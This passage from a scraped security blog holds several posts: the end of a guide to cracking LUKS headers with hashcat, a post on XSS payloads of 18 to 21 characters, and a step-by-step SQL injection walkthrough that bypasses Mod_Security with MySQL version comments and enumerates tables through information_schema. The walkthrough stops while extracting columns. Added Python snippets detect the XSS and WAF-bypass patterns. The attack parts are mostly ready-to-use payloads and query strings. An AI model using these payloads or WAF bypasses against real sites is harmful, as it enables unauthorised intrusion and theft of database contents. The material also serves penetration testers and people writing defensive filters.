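def build_luks2_sample(meta=SAMPLE_META, total_size=MIN_HEADER_BYTES):
    """Construct a minimal LUKS2 header in memory (test input, not a real disk image)."""
    json_size = int(meta["config"]["json_size"])
    hdr = bytearray(LUKS2_BIN_HDR_SIZE)
    hdr[0:6] = LUKS_MAGIC
    hdr[6:8] = struct.pack(">H", 2)
    hdr[8:16] = struct.pack(">Q", LUKS2_BIN_HDR_SIZE + json_size)
    body = bytes(hdr) + json.dumps(meta).encode().ljust(json_size, b"\x00")
    return body.ljust(total_size, b"\x00")


def build_luks1_sample(cipher=b"aes", mode=b"xts-plain64", hash_spec=b"sha256",
                       total_size=MIN_HEADER_BYTES):
    """Construct a minimal LUKS1 header in memory (test input, not a real disk image)."""
    hdr = bytearray(LUKS1_PHDR_SIZE)
    hdr[0:6] = LUKS_MAGIC
    hdr[6:8] = struct.pack(">H", 1)
    hdr[8:8 + len(cipher)] = cipher
    hdr[40:40 + len(mode)] = mode
    hdr[72:72 + len(hash_spec)] = hash_spec
    return bytes(hdr).ljust(total_size, b"\x00")


def summarize(info):
    """One line to compare against hashcat's documented support for the chosen mode."""
    line = f"LUKS{info['version']} encryption={info['encryption']} kdf={info['kdf']} hash={info['hash']}"
    if not info["size_ok"]:
        line += f" [WARNING: shorter than {MIN_HEADER_BYTES} bytes, re-run dd]"
    return line


if __name__ == "__main__":
    # usage: python luks_check.py encriptedheader.crack (falls back to the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_luks2_sample()
    print(summarize(parse_luks_header(data)))
```

A header that reports a KDF other than the one your hashcat mode documents, or a size warning, means the file is not ready; fix that before spending GPU time.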
<span style="letter-spacing: 0px;"><br />I used this syntax for hashcat, but of course, you can change it according to your needs.
</span><br />
<b><br />hashcat -m 14600 -O -a 0 -w 3 encriptedheader.crack example.dict<span style="letter-spacing: 0px;"> -o crackedpass.txt</span></b><br />
<span style="letter-spacing: 0px;"><br /></span>
<span style="letter-spacing: 0px;">If everything is fine, you will see this output.</span><br />
hashcat (v5.1.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
* Device #2: Intel's OpenCL runtime (GPU only) is currently broken.<br />
We are waiting for updated OpenCL drivers from Intel.<br />
You can use --force to override, but do not report related errors.<br />
nvmlDeviceGetFanSpeed(): Not Supported<br />
<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce MX130, 512/2048 MB allocatable, 3MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) UHD Graphics 620, skipped.<br />
* Device #3: Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
Rules: 1<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Single-Hash<br />
* Single-Salt<br />
* Slow-Hash-SIMD-LOOP<br />
<br />
Minimum password length supported by kernel: 0<br />
Maximum password length supported by kernel: 256<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
<br />
Dictionary cache hit:<br />
* Filename..: example.dict<br />
* Passwords.: 128416<br />
* Bytes.....: 1069601<br />
* Keyspace..: 128416<br />
<br />
Cracking performance lower than expected?<br />
<br />
* Update your OpenCL runtime / driver the right way:<br />
https://hashcat.net/faq/wrongdriver<br />
<br />
* Create more work items to make use of your parallelization power:<br />
https://hashcat.net/faq/morework<br />
<br />
<br />
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =><br />
<br />
Session..........: hashcat<br />
Status...........: Running<br />
<span style="background-color: white;">Hash.Type........: LUKS</span><br />
Hash.Target......: encriptedheader.crack<br />
Time.Started.....: Tue Mar 10 12:31:13 2020 (23 secs)<br />
Time.Estimated...: Tue Mar 10 12:51:19 2020 (19 mins, 43 secs)<br />
Guess.Base.......: File (example.dict)<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.#1.........: 107 H/s (4.22ms) @ Accel:2 Loops:256 Thr:64 Vec:1<br />
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts<br />
Progress.........: 2304/128416 (1.79%)<br />
Rejected.........: 0/2304 (0.00%)<br />
Restore.Point....: 2304/128416 (1.79%)<br />
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:45312-45568<br />
Candidates.#1....: 0611soep -> 078112025<br />
Hardware.Mon.#1..: Temp: 70c Util: 98% Core:1032MHz Mem:2505MHz Bus:4<br />
<br />
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =><br />
<br />
<br />
Otherwise, if you receive the error:<br />
<br />
Hashfile 'encriptedheader.crack': Invalid LUKS version<br />
No hashes loaded.<br />
<br />
This indicates either that the file was not created properly (double-check the file size and the headers) or that hashcat is not compatible with the LUKS version the disk was encrypted with.<br />
<br />
<span style="letter-spacing: 0px;">Have a nice cracking!</span><br />
<br /><br />UPDATE:<br />You can limit binwalk's output using `--size $((2**22))` and make it halt on the first match with `--count 1`. I also recommend using `qemu-img dd` to limit how much of the input image you process.<br /><br />Tip from: https://twitter.com/PEdrArthur<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-3991672218382726192017-08-02T03:43:00.000-07:002018-07-25T02:47:45.018-07:00
Super Short XSS payload<br />
Hi Guys!<br />
<br />
Some time ago we were testing an application and we found a very limited reflected XSS vuln, injecting straight into the page, and we had only 22 chars to exploit it.<br />
<br />
After some testing, the following payload worked very well:<br />
<svg/onload=alert(1)> or <svg onload=alert(1)><br />
<br />
This <svg> payload has 21 chars, but we were still not happy with the size.<br />
<br />
Checking the HTML documentation, it was possible to find the oncut event handler, which obviously has fewer chars than onload.<br />
Well, as the name oncut makes clear, we need something to cut on the web page.<br />
So we need a small HTML tag that accepts text: <p>.<br />
<br />
In this case, the payload will be the following:<br />
<p/oncut=alert(1)>A or <p oncut=alert(1)>A<br />
<br />
Bingo! We have a functional XSS payload with 19 chars. \o/<br />
<br />
The problem: to trigger the payload, of course, the user must try to cut the "A". In other words, unlike onload, which fires automatically, this payload requires user interaction.<br />
<br />
Another super short payload we can use, with 18 chars, is:<br />
<a/oncut=alert(1)> or <a oncut=alert(1)><br />
<br />
<br />
In this case, some text must already exist in the page body after the injected <a> tag and, as with the previous payload, the user must try to cut some text after the <a> tag. In other words, as in the previous example, this payload requires user interaction.<br />
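A detection check for the payloads in this post, added here as an example and not part of the original write-up: it tokenizes start tags the way a browser does, where `/` separates the tag name from an attribute just as whitespace does, so `<p/oncut=...>` yields an `oncut` handler exactly like `<p oncut=...>`. It compares that with a naive regex filter that insists on whitespace between the tag and the `on*` attribute, the kind of check these short payloads slip past; the sample inputs are the payloads from this post.

```python
"""Find inline event-handler attributes in HTML the way a browser tokenizer does.

Added example for this post (not the post's own code). The point: after the
tag name, both whitespace and '/' start an attribute, so '<p/oncut=...>' and
'<p oncut=...>' carry the same handler. A filter that only looks for
'<tag<space>on...=' misses the slash form.
"""
import re
from typing import List, Tuple

WHITESPACE = " \t\n\r\f"

# A naive filter that requires whitespace between the tag name and the handler.
NAIVE_HANDLER_FILTER = re.compile(r"<\w+\s+on\w+\s*=", re.IGNORECASE)

# Constructed inputs: the payloads discussed in this post.
POST_PAYLOADS = [
    "<svg/onload=alert(1)>",
    "<svg onload=alert(1)>",
    "<p/oncut=alert(1)>A",
    "<p oncut=alert(1)>A",
    "<a/oncut=alert(1)>",
    "<a oncut=alert(1)>",
]


def start_tags(html: str) -> List[Tuple[str, List[Tuple[str, str]]]]:
    """Return (tag_name, [(attr_name, attr_value), ...]) for each start tag.

    Follows the HTML tokenizer's handling of start tags: the tag name ends at
    whitespace, '/' or '>'; attribute names end at whitespace, '/', '=' or '>';
    values may be unquoted (ending at whitespace or '>') or quoted.
    Names are lower-cased, as browsers do.
    """
    tags = []
    i, n = 0, len(html)
    while i < n:
        if html[i] != "<" or i + 1 >= n or not html[i + 1].isalpha():
            i += 1
            continue
        i += 1
        j = i
        while j < n and html[j] not in WHITESPACE + "/>":
            j += 1
        tag, attrs, i = html[i:j].lower(), [], j
        while i < n and html[i] != ">":
            if html[i] in WHITESPACE + "/":      # '/' is an attribute separator here
                i += 1
                continue
            j = i
            while j < n and html[j] not in WHITESPACE + "/=>":
                j += 1
            name, value, i = html[i:j].lower(), "", j
            while i < n and html[i] in WHITESPACE:
                i += 1
            if i < n and html[i] == "=":
                i += 1
                while i < n and html[i] in WHITESPACE:
                    i += 1
                if i < n and html[i] in "\"'":
                    quote = html[i]
                    j = html.find(quote, i + 1)
                    j = n if j < 0 else j
                    value, i = html[i + 1:j], j + 1
                else:
                    j = i
                    while j < n and html[j] not in WHITESPACE + ">":
                        j += 1
                    value, i = html[i:j], j
            attrs.append((name, value))
        tags.append((tag, attrs))
        i += 1
    return tags


def event_handlers(html: str) -> List[Tuple[str, str]]:
    """List (tag, attribute) pairs for every on* attribute found by the tokenizer."""
    return [(tag, name) for tag, attrs in start_tags(html)
            for name, _ in attrs if name.startswith("on")]


def naive_filter_hits(html: str) -> bool:
    """What the whitespace-only regex sees, for comparison with event_handlers()."""
    return NAIVE_HANDLER_FILTER.search(html) is not None


if __name__ == "__main__":
    for payload in POST_PAYLOADS:
        print(f"{payload:<24} tokenizer={event_handlers(payload)} "
              f"naive_regex={naive_filter_hits(payload)}")
```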
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ctL1Jm36_Bk/W1hG7oSE-zI/AAAAAAAABzA/ZFqfC_NKUr0Rf7oyndBsyRouLd97IuGJwCEwYBhgL/s1600/ScreenHunter_539%2BJul.%2B25%2B11.44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="412" data-original-width="413" height="319" src="https://1.bp.blogspot.com/-ctL1Jm36_Bk/W1hG7oSE-zI/AAAAAAAABzA/ZFqfC_NKUr0Rf7oyndBsyRouLd97IuGJwCEwYBhgL/s320/ScreenHunter_539%2BJul.%2B25%2B11.44.jpg" width="320" /></a></div>
<br />
<br /><br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-41297260514280726652016-06-23T01:49:00.000-07:002016-06-23T01:49:19.092-07:00
Exploiting SQL Injection by Bypassing WAF (Mod_Security)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span style="font-family: Times, Times New Roman, serif;">For years, SQL injection has been the most dreaded and frightening of all vulnerabilities discovered to date. The power of a single quote (') is beyond comparison. SQL injection attacks were first discovered in 1998, with one of the first live attacks taking place in 2002 on the fashion retailer Guess, and the rest is history. Billions of dollars and many reputations have been lost. In spite of multiple forms of fixes, it is a never-ending war between developers and hackers: if the former come up with a way to prevent it, the latter come up with a way to bypass it. </span></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span style="font-family: Times, Times New Roman, serif;">This post gives in-depth insight into the techniques used to bypass one such prevention method. It will not teach you the basics of SQL injection, so I recommend going through the OWASP material before even thinking about jumping into advanced techniques. The focus here is on bypassing Mod_Security (a web application firewall) and eventually exploiting a SQL injection vulnerability. </span></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">The Attack:</span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
First and
foremost, we need to find our target website. In this case I am using:</div>
<a href="http://targetsite.com/demo/exams.php?sort=8">http://targetsite.com/demo/exams.php?sort=8</a><div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XMzR4ohPgpY/V2uZdK1_M9I/AAAAAAAAxdc/owuM5Zexer44GrhNLFOaUvkndy6Bz1nYwCLcB/s1600/1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="289" src="https://2.bp.blogspot.com/-XMzR4ohPgpY/V2uZdK1_M9I/AAAAAAAAxdc/owuM5Zexer44GrhNLFOaUvkndy6Bz1nYwCLcB/s640/1.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Looks perfect! Right? Now let's try to insert a single quote at the end of the URL and observe what happens:</div>
<a href="http://targetsite.com/demo/exams.php?sort=8">http://targetsite.com/demo/exams.php?sort=8</a>'</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://4.bp.blogspot.com/-oZ_9eeUVRTg/V2uZgkkjmZI/AAAAAAAAxeQ/BqaMpGBljHQmFsO6oiNo4pwkghtF7yikwCKgB/s1600/2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="302" src="https://4.bp.blogspot.com/-oZ_9eeUVRTg/V2uZgkkjmZI/AAAAAAAAxeQ/BqaMpGBljHQmFsO6oiNo4pwkghtF7yikwCKgB/s640/2.jpg" width="640" /></a></div>
<div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Hmmm!! Different response!</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
The page appears, but with no data. So something did happen, but we still have no confirmation of whether SQL injection exists. Let's modify our query a bit to see how the application responds.<br />
<a href="http://targetsite.com/demo/exams.php?sort=8%27%20or%201=1--" style="text-align: start;">http://targetsite.com/demo/exams.php?sort=8' or 1=1--</a><br />
<br />
<div class="separator" style="clear: both; text-align: justify;">
</div>
Normally, a vulnerable website would return values from the entire table for the above query, since the Boolean condition is always true. Let's see how this website responds:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-_2Dv5XVFy0Q/V2uZgg6UkUI/AAAAAAAAxeQ/TKps1L8RkWoHcYDb121LrPOLNchVloNlQCKgB/s1600/3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="85" src="https://2.bp.blogspot.com/-_2Dv5XVFy0Q/V2uZgg6UkUI/AAAAAAAAxeQ/TKps1L8RkWoHcYDb121LrPOLNchVloNlQCKgB/s640/3.jpg" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">BLOCKED!</span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
It seems like our target website has a WAF implemented to protect itself. So, if I am not wrong, any attacks directed at the database will be blocked by Mod_Security. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Well, in some cases it is possible to block such attacks, provided the implementation is done correctly, an up-to-date version of the WAF is used, and security patches are rolled out regularly. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
But then again,
aren't we hackers? We don't give up, do we? Let's try to get around it. Sounds
intriguing? Let's play.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
First, we need to make some queries work, just to be sure that SQL injection indeed exists.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Finding the Number of Columns:</span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
So far I would say that we are hacking in the dark: no real MySQL errors have actually proved the presence of SQL injection. The only success we had was the blank page we received after adding a single quote to the URL above: no rows, no data. This can, however, mean that we somehow managed to change the structure of the underlying query and that the page might be vulnerable to SQL injection. Let's try to get some confirmation. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Finding the number of columns returned by the underlying query might actually prove its presence. This can be achieved with a simple "ORDER BY" clause.</div>
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%201--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 1-- </a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-LguXN-PL65Q/V2uZg1zbgcI/AAAAAAAAxeQ/meqhmcWEeA0liBa7wpbgPIYIna-XcViMACKgB/s1600/4.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="294" src="https://2.bp.blogspot.com/-LguXN-PL65Q/V2uZg1zbgcI/AAAAAAAAxeQ/meqhmcWEeA0liBa7wpbgPIYIna-XcViMACKgB/s640/4.jpg" width="640" /></a></div>
<div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
No Error! Expected Response! Cool... there's hope after all...</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let's proceed
further…</div>
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%202--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 2-- </a> No Error<br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%203--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 3--</a> No Error <br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%204--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 4--</a> No Error <br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%205--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 5--</a> No Error <br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%206--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 6--</a> No Error <br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%207--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 7--</a> No Error but a Blank Page<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-w2PhcJ8PV8M/V2uZg4L99II/AAAAAAAAxeQ/xAtGDaMdcwsT2gBByylDtjBnLOqg716bgCKgB/s1600/5.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="302" src="https://4.bp.blogspot.com/-w2PhcJ8PV8M/V2uZg4L99II/AAAAAAAAxeQ/xAtGDaMdcwsT2gBByylDtjBnLOqg716bgCKgB/s640/5.jpg" width="640" /></a></div>
<br />
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
As seen above, the <b><i>ORDER BY 7--</i></b> query generated a different response, thereby proving that the underlying query returns 6 columns. We were lucky, though, since the WAF did not block the '<b>ORDER</b>' keyword. We need that sometimes!</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
However, now that we know the number of columns in use, let's see which columns get displayed in the response.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
The query would
look like:<br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20UNION%20Select%201,2,3,4,5,6--" style="text-align: start;"> http://targetsite.com/demo/exams.php?sort=8 UNION Select 1,2,3,4,5,6--</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-pzbfwNXWIjo/V2uZg6NQJTI/AAAAAAAAxeQ/rhFc3ulFONIwYba6moyhsdM4ikRKYxygwCKgB/s1600/6.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="84" src="https://4.bp.blogspot.com/-pzbfwNXWIjo/V2uZg6NQJTI/AAAAAAAAxeQ/rhFc3ulFONIwYba6moyhsdM4ikRKYxygwCKgB/s640/6.jpg" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
OOPS! Mod_Security again!</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
So I guess the filter has been set on the 'UNION' and 'SELECT' keywords. Now it's time to actually bypass the WAF (since we've had enough of it) by modifying the query and forcing the backend database to return the data we want.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Bypassing WAF:</span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let's try the modified query below:</div>
<a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6--+">http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6--+</a></div>
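Why the modified query gets through: as the post guesses, the WAF matched the keyword tokens in the raw request, while MySQL executes the body of a `/*!50000 ... */` version comment. The check below is an added example, not code from this post or from Mod_Security: it normalizes the request the way a WAF rule should before matching (URL-decode, unwrap MySQL version comments while keeping their body, drop ordinary comments, lowercase and collapse whitespace, the same intent as ModSecurity transformation functions such as t:urlDecodeUni and t:lowercase) and runs the raw and the normalized matcher over the request strings from this post, including the mixed-case, comment-wrapped identifiers used in the extraction steps further down (targetsite.com is the post's placeholder host). The `union ... select` rule is a constructed stand-in for the WAF's real signature.

```python
"""Keyword matching on raw vs. normalized SQL fragments.

Added example for this post, not the post's code or Mod_Security's. MySQL
executes the body of a '/*!50000 ... */' version comment, so a WAF that
matches keywords on the raw request never sees 'union select' while the
database does. Normalizing first closes that gap for this specific evasion;
the injection itself is fixed with parameterized queries, not with the WAF.
"""
import re
from urllib.parse import unquote_plus

# Constructed inputs: the query strings used in this post (placeholder host).
BLOCKED_REQUEST = "http://targetsite.com/demo/exams.php?sort=8 UNION Select 1,2,3,4,5,6--"
BYPASS_REQUEST = ("http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/"
                  "+/*!50000select*/+1,2,3,4,5,6--+")
TABLES_REQUEST = ("http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/"
                  "+1,2,3,4,5,/*!50000gROup_cONcat(table_name,0x0a)%20*/+from+"
                  "/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/"
                  "+/*!50000taBLe_scheMA%20*/like+database()--+")
BENIGN_REQUEST = "http://targetsite.com/demo/exams.php?sort=8"

# Stand-in signature: 'union' followed later by 'select', as whole words.
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.DOTALL)
# MySQL version comment: the body executes when the server version is >= NNNNN.
VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.DOTALL)
# Ordinary comment: ignored by the parser, so it is whitespace for matching.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def raw_keyword_filter(request: str) -> bool:
    """Match the keywords on the raw request, case-insensitively.

    '/*!50000union*/' does not match: the digits glue onto 'union', so there
    is no word boundary before it, and the comment markers sit between the
    two keywords.
    """
    return UNION_SELECT.search(request.lower()) is not None


def normalize_sql_fragment(request: str) -> str:
    """Reduce the request to roughly what the MySQL parser will see."""
    text = unquote_plus(request)                  # '+' and '%20' become spaces
    text = VERSION_COMMENT.sub(r" \1 ", text)     # keep the executable body
    text = PLAIN_COMMENT.sub(" ", text)           # drop inert comments
    return re.sub(r"\s+", " ", text).strip().lower()


def normalized_keyword_filter(request: str) -> bool:
    """The same rule, applied after normalization."""
    return UNION_SELECT.search(normalize_sql_fragment(request)) is not None


def touches_information_schema(request: str) -> bool:
    """Flag metadata enumeration even when the schema name is comment-wrapped or mixed-case."""
    return "information_schema" in normalize_sql_fragment(request)


if __name__ == "__main__":
    for label, req in [("blocked", BLOCKED_REQUEST), ("bypass", BYPASS_REQUEST),
                       ("tables", TABLES_REQUEST), ("benign", BENIGN_REQUEST)]:
        print(f"{label:>8}: raw={raw_keyword_filter(req)!s:<5} "
              f"normalized={normalized_keyword_filter(req)!s:<5} "
              f"information_schema={touches_information_schema(req)}")
```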
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-nU1Qmpm4bhs/V2uZg-ZJdOI/AAAAAAAAxeQ/x27lMdzM3AUoC8WGmjiay0inCOAzm15VQCKgB/s1600/7.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://2.bp.blogspot.com/-nU1Qmpm4bhs/V2uZg-ZJdOI/AAAAAAAAxeQ/x27lMdzM3AUoC8WGmjiay0inCOAzm15VQCKgB/s640/7.jpg" width="640" /></a></div>
<div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
It seems that the 3rd, 4th and 6th columns are being displayed. Now we can use the injection to extract data and display it in those columns.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let's extract our first GOLDEN PRIZED data by finding out the MySQL version and the current database user.<br />
<a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,%20current_user(),@@version,5,6--+">http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2, current_user(),@@version,5,6--+</a><br />
<b style="text-align: start;"><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-FxEnHPULbSA/V2uZhPOfgqI/AAAAAAAAxeQ/6ESsxHQ6SO4kviLrccsIZrvsR6gnVHyiwCKgB/s1600/8.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="290" src="https://4.bp.blogspot.com/-FxEnHPULbSA/V2uZhPOfgqI/AAAAAAAAxeQ/6ESsxHQ6SO4kviLrccsIZrvsR6gnVHyiwCKgB/s640/8.jpg" width="640" /></a></div>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Extracting Data from Database:</span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Since we know it's a MySQL database, we also know there are some globally defined database tables, columns, and schemas. The names and hierarchy are as follows:</div>
<div class="ListParagraphCxSpFirst" style="margin-top: 12.0pt; mso-add-space: auto; text-align: justify;">
• <b><span style="color: red;">information_schema</span></b> - the name of the meta-database in MySQL, which has the following table</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 54.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; text-align: justify;">
◦ <b><span style="color: #1f497d;">columns</span></b> - the table in information_schema which in turn has the following columns</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 90.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; text-align: justify;">
▪ <span style="color: #00b050;">table_name</span> - all tables in all databases</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 90.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; text-align: justify;">
▪ <span style="color: #00b050;">column_name</span> - all columns in all the tables of all the databases</div>
<div class="ListParagraphCxSpLast" style="margin-bottom: 10.0pt; margin-left: 90.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; text-align: justify;">
▪ <span style="color: #00b050;">table_schema</span> - all databases on the server</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Now let’s use
this to get some data.</div>
<div class="ListParagraph" style="margin-bottom: 10.0pt; margin-left: 18.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l2 level1 lfo4; text-align: justify; text-indent: -18.0pt;">
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Step 1. Extracting Tables:</span></b><br />
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(table_name,0x0a)%20*/+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+">http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(table_name,0x0a) */+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA */like+database()--+</a><br />
<b style="text-align: start; text-indent: 0px;"><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-us-lkt9mE8Q/V2uZhNu_rOI/AAAAAAAAxeQ/dn-SfAADVaEPNKg19dD-Ymbxkx1xqaSFgCKgB/s1600/9.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="364" src="https://3.bp.blogspot.com/-us-lkt9mE8Q/V2uZhNu_rOI/AAAAAAAAxeQ/dn-SfAADVaEPNKg19dD-Ymbxkx1xqaSFgCKgB/s640/9.jpg" width="640" /></a></div>
<b style="text-align: start; text-indent: 0px;"><br /></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Anything interesting? The '<b>users</b>' table seems interesting!</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let's query it
further to see what kind of columns it has.</div>
<div class="ListParagraph" style="margin-bottom: 10.0pt; margin-left: 18.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l2 level1 lfo4; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: Calibri;">Step 2.<span style="font-size: 7pt; font-stretch: normal; font-weight: normal; line-height: normal;"> </span></span></b><!--[endif]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Extracting Columns from 'users' Table<o:p></o:p></span></b><br />
